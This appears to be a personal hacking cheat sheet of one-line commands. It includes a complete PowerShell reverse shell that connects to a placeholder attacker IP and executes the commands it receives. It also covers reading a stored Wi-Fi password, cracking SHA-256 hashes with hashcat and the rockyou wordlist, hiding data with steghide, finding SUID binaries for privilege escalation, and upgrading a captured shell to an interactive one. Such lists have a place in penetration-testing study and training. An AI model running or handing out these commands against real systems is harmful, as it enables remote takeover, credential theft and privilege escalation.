* How to create server:
	sudo python3 -m http.server 8000
	Other End:
 		( 192.168.1.2:8000 )
* How to get the current connection paswsword:
	security find-generic-password -wa wifiname
* How to use steghide:
	steghide embed -ef [file] -cf [coverfile]
	Extraxt:
	steghide extract -sf [file]
* proxychains location: 
	/usr/local/etc
* Powershell reverse shell:
	powershell -c "$client = New-Object 
System.Net.Sockets.TCPClient('<ip>',<port>);$stream = 
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = 
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object 
-TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = 
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path 
+ '> ';$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

* run ghidra:
	ghidraRun

*-----##-----*

how to use hashcat:
	hashcat -m 1400 -a 0 -o sha_cracked.txt sha2–256.txt 
	/usr/share/wordlists/rockyou.txt

*-----##-----*
how to find SUID/GUID:
	find / -perm -u=s -type f 2>/dev/null

*-----##-----*
Upgrading Simple Shells to Fully Interactive:
	python -c 'import pty; pty.spawn("/bin/bash")'

*-----##-----*
 
